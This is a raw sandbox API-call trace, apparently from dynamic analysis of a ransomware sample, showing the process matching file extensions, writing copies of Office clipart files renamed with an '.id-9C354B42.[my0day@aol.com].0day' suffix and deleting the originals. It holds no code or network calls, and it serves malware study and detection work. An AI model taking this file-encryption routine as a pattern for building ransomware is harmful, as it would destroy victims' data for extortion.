[0274.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0274.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0274.003] lstrlenW (lpString=".doc") returned 4 [0274.003] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.003] lstrlenW (lpString=".docx") returned 5 [0274.003] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.003] lstrlenW (lpString=".pdf") returned 4 [0274.003] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.003] lstrlenW (lpString=".xls") returned 4 [0274.003] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.003] lstrlenW (lpString=".xlsx") returned 5 [0274.003] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.003] lstrlenW (lpString=".ppt") returned 4 [0274.003] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0274.003] lstrlenW (lpString=".zip") returned 4 [0274.003] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.004] lstrlenW (lpString=".rar") returned 4 [0274.004] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.004] lstrlenW (lpString=".bz2") returned 4 [0274.004] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.004] lstrlenW (lpString=".7z") returned 3 [0274.004] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0274.004] lstrlenW (lpString=".dbf") returned 4 [0274.004] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0274.004] lstrlenW (lpString=".1cd") returned 4 [0274.004] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0274.004] lstrlenW (lpString=".jpg") returned 4 [0274.004] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0274.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0274.004] lstrlenW (lpString=".doc") returned 4 [0274.004] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.004] lstrlenW (lpString=".docx") returned 5 [0274.004] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.004] lstrlenW (lpString=".pdf") returned 4 [0274.004] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.004] lstrlenW (lpString=".xls") returned 4 [0274.004] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.004] lstrlenW (lpString=".xlsx") returned 5 [0274.004] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.004] lstrlenW (lpString=".ppt") returned 4 [0274.004] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0274.004] lstrlenW (lpString=".zip") returned 4 [0274.004] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.004] lstrlenW (lpString=".rar") returned 4 [0274.004] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.005] lstrlenW (lpString=".bz2") returned 4 [0274.005] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.005] lstrlenW (lpString=".7z") returned 3 [0274.005] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0274.005] lstrlenW (lpString=".dbf") returned 4 [0274.005] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0274.005] lstrlenW (lpString=".1cd") returned 4 [0274.005] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0274.005] lstrlenW (lpString=".jpg") returned 4 [0274.005] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.005] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.005] lstrlenW (lpString="DD01163_.WMF") returned 12 [0274.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.020] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=2300) returned 1 [0274.022] CloseHandle (hObject=0x37c) returned 1 [0274.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf")) returned 0x20 [0274.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.038] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.038] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0274.041] GetLastError () returned 0x0 [0274.041] ReadFile (in: hFile=0x37c, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x8fc, lpOverlapped=0x0) returned 1 [0274.055] WriteFile (in: hFile=0x2cc, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x900, lpOverlapped=0x0) returned 1 [0274.056] ReadFile (in: hFile=0x37c, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.056] WriteFile (in: hFile=0x2cc, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.056] SetEndOfFile (hFile=0x2cc) returned 1 [0274.056] CloseHandle (hObject=0x2cc) returned 1 [0274.056] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.056] SetEndOfFile (hFile=0x37c) returned 1 [0274.058] CloseHandle (hObject=0x37c) returned 1 [0274.058] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.059] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf")) returned 1 [0274.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0274.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0274.059] lstrlenW (lpString=".doc") returned 4 [0274.059] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.059] lstrlenW (lpString=".docx") returned 5 [0274.059] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.059] lstrlenW (lpString=".pdf") returned 4 [0274.059] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.059] lstrlenW (lpString=".xls") returned 4 [0274.059] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.059] lstrlenW (lpString=".xlsx") returned 5 [0274.059] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.059] lstrlenW (lpString=".ppt") returned 4 [0274.059] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0274.059] lstrlenW (lpString=".zip") returned 4 [0274.059] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.059] lstrlenW (lpString=".rar") returned 4 [0274.059] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.059] lstrlenW (lpString=".bz2") returned 4 [0274.059] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.059] lstrlenW (lpString=".7z") returned 3 [0274.060] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0274.060] lstrlenW (lpString=".dbf") returned 4 [0274.060] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0274.060] lstrlenW (lpString=".1cd") returned 4 [0274.060] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0274.060] lstrlenW (lpString=".jpg") returned 4 [0274.060] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0274.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0274.060] lstrlenW (lpString=".doc") returned 4 [0274.060] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.060] lstrlenW (lpString=".docx") returned 5 [0274.060] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.060] lstrlenW (lpString=".pdf") returned 4 [0274.060] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.060] lstrlenW (lpString=".xls") returned 4 [0274.060] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.060] lstrlenW (lpString=".xlsx") returned 5 [0274.060] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.060] lstrlenW (lpString=".ppt") returned 4 [0274.060] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0274.060] lstrlenW (lpString=".zip") returned 4 [0274.060] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.060] lstrlenW (lpString=".rar") returned 4 [0274.060] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.060] lstrlenW (lpString=".bz2") returned 4 [0274.060] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.060] lstrlenW (lpString=".7z") returned 3 [0274.060] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0274.061] lstrlenW (lpString=".dbf") returned 4 [0274.061] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0274.061] lstrlenW (lpString=".1cd") returned 4 [0274.061] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0274.061] lstrlenW (lpString=".jpg") returned 4 [0274.061] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.061] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.061] lstrlenW (lpString="DD01167_.WMF") returned 12 [0274.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0274.071] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=2080) returned 1 [0274.071] CloseHandle (hObject=0x384) returned 1 [0274.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf")) returned 0x20 [0274.072] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.072] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.072] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0274.072] GetLastError () returned 0x0 [0274.072] ReadFile (in: hFile=0x37c, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x820, lpOverlapped=0x0) returned 1 [0274.078] WriteFile (in: hFile=0x2cc, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x830, lpOverlapped=0x0) returned 1 [0274.080] ReadFile (in: hFile=0x37c, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.080] WriteFile (in: hFile=0x2cc, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.080] SetEndOfFile (hFile=0x2cc) returned 1 [0274.080] CloseHandle (hObject=0x2cc) returned 1 [0274.080] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.080] SetEndOfFile (hFile=0x37c) returned 1 [0274.082] CloseHandle (hObject=0x37c) returned 1 [0274.082] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.083] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf")) returned 1 [0274.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0274.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0274.083] lstrlenW (lpString=".doc") returned 4 [0274.083] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.083] lstrlenW (lpString=".docx") returned 5 [0274.083] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.083] lstrlenW (lpString=".pdf") returned 4 [0274.083] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.083] lstrlenW (lpString=".xls") returned 4 [0274.083] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.083] lstrlenW (lpString=".xlsx") returned 5 [0274.083] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.083] lstrlenW (lpString=".ppt") returned 4 [0274.083] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0274.083] lstrlenW (lpString=".zip") returned 4 [0274.083] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.083] lstrlenW (lpString=".rar") returned 4 [0274.083] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.083] lstrlenW (lpString=".bz2") returned 4 [0274.083] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.083] lstrlenW (lpString=".7z") returned 3 [0274.083] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0274.083] lstrlenW (lpString=".dbf") returned 4 [0274.083] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0274.083] lstrlenW (lpString=".1cd") returned 4 [0274.084] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0274.084] lstrlenW (lpString=".jpg") returned 4 [0274.084] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0274.084] lstrlenW (lpString=".doc") returned 4 [0274.084] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.084] lstrlenW (lpString=".docx") returned 5 [0274.084] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.084] lstrlenW (lpString=".pdf") returned 4 [0274.084] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.084] lstrlenW (lpString=".xls") returned 4 [0274.084] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.084] lstrlenW (lpString=".xlsx") returned 5 [0274.084] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.084] lstrlenW (lpString=".ppt") returned 4 [0274.084] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0274.084] lstrlenW (lpString=".zip") returned 4 [0274.084] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.084] lstrlenW (lpString=".rar") returned 4 [0274.084] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.084] lstrlenW (lpString=".bz2") returned 4 [0274.084] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.084] lstrlenW (lpString=".7z") returned 3 [0274.084] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0274.084] lstrlenW (lpString=".dbf") returned 4 [0274.084] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0274.084] lstrlenW (lpString=".1cd") returned 4 [0274.084] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0274.084] lstrlenW (lpString=".jpg") returned 4 [0274.084] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.085] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.085] lstrlenW (lpString="DD01168_.WMF") returned 12 [0274.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.085] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=2004) returned 1 [0274.085] CloseHandle (hObject=0x37c) returned 1 [0274.085] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf")) returned 0x20 [0274.085] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.085] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.085] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0274.086] GetLastError () returned 0x0 [0274.086] ReadFile (in: hFile=0x37c, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x7d4, lpOverlapped=0x0) returned 1 [0274.096] WriteFile (in: hFile=0x2cc, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x7e0, lpOverlapped=0x0) returned 1 [0274.097] ReadFile (in: hFile=0x37c, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.097] WriteFile (in: hFile=0x2cc, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.097] SetEndOfFile (hFile=0x2cc) returned 1 [0274.097] CloseHandle (hObject=0x2cc) returned 1 [0274.097] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.097] SetEndOfFile (hFile=0x37c) returned 1 [0274.099] CloseHandle (hObject=0x37c) returned 1 [0274.099] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.100] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf")) returned 1 [0274.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0274.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0274.100] lstrlenW (lpString=".doc") returned 4 [0274.100] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.100] lstrlenW (lpString=".docx") returned 5 [0274.100] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.100] lstrlenW (lpString=".pdf") returned 4 [0274.100] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.100] lstrlenW (lpString=".xls") returned 4 [0274.100] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.100] lstrlenW (lpString=".xlsx") returned 5 